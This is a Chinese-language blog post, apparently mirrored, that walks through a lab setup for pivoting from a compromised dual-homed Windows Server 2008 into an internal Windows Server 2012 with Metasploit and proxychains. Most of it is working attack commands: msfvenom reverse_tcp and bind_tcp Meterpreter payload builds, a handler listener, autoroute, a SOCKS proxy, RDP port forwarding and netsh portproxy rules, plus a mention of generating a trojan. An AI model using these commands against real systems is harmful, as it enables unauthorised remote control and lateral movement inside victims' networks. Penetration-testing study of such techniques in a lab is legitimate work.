zoukankan      html  css  js  c++  java
  • msf+proxychains组合搭建socks5隧道

    0x00 实验环境

    攻击机:win(192.168.43.10)+kali(192.168.43.243)

    受害机

    winserver2008(IP:192.168.43.146、192.168.127.157;双网卡,一个公网一个内网)

    winserver2012(IP:192.168.127.160;仅主机:一个内网)

    0x01 实验效果

    在已经拿到winserver2008服务器的前提下,通过msf与proxychains搭建隧道能通往winserver2012的隧道,获取winserver2012的服务器权限。

    (1)假设已拿到winserver2008的服务器权限,用msf做演示:

    msf生成exe控winserver2008:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.234 LPORT=12345 -f exe > ./test.exe 
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.43.234
    set LPORT 12345
    run

    此时查看一下路由

    route

    然后添加路由

    run autoroute -s 192.168.127.0

    然后查看添加的路由
    run autoroute -p

    background

    然后搜索可以做代理的模块,并使用它:

    use auxiliary/server/socks_proxy

    show options
    set username admin
    set password admin

     

     然后run:

    run

    #使用proxychains或者proxifier测试一下是否成功:

    (1)proxifier是成功的:

     (2)使用proxychains测试——需要先自行安装:

    sudo apt-get install proxychains

    发现是可以使用的:

     

     上述即为msf作代理的方法。

    (3)小tips:

    如果内网的服务器3389端口不出网,可以使用msf转发至别的端口:

    首先代理启动msf:

    proxychains msfconsole 

    注:可获取192.168.127.160服务器权限:

    msfvenom -p windows/meterpreter/bind_tcp LPORT=9797 -f exe > ./t.exe

     

     注:设置代理结束后,可在43.x的shell的基础上进行端口转发,只要能访问到127.160主机的3389端口就能将3389端口转发出来:

    portfwd add -l 9837 -r 192.168.127.160 -p 3389

     kali即可直接访问登录127.160主机:

    注:在反向连接的情况下,需要做端口映射:

    https://www.cnblogs.com/xiaozi/p/9453944.html

    假定需要通过192.168.127.160的3389端口转发到8787端口,则需要在192.168.43.157主机的命令行输入如下语句:
    netsh interface portproxy add v4tov4 listenport=8787 listenaddress=192.168.127.160 connectport=3389 connectaddress=192.168.127.160

    生成一个8081的木马,在43.157主机本机的shell内执行端口映射,映射8081端口到9808:


    netsh interface portproxy add v4tov4 listenport=8081 listenaddress=0.0.0.0 connectport=9809 connectaddress=192.168.127.157
    netsh interface portproxy delete v4tov4 listenport=8081 listenaddress=192.168.127.157
    netsh interface portproxy show all
  • 相关阅读:
    编译原理 —— 正规式、正规集和正则定义
    NFA的确定化
    第三章 词法分析与有限自动机
    文法:0型【短语文法】、1型【上下文有关文法】、2型【上下文无关文法】、3型【正规文法】
    语法树、短语、直接短语、句柄、素短语、最左素短语
    【第1章 编译概述】1.2编译程序的发展
    【第1章 编译概述】1.2编译的各个阶段
    【第1章 编译概述】1.1 编译程序功能
    【第1章 编译概述】1.1 程序设计语言
    【第9章 目标代码生成】9.3 简单代码生成器
  • 原文地址:https://www.cnblogs.com/cute-puli/p/15510271.html
Copyright © 2011-2022 走看看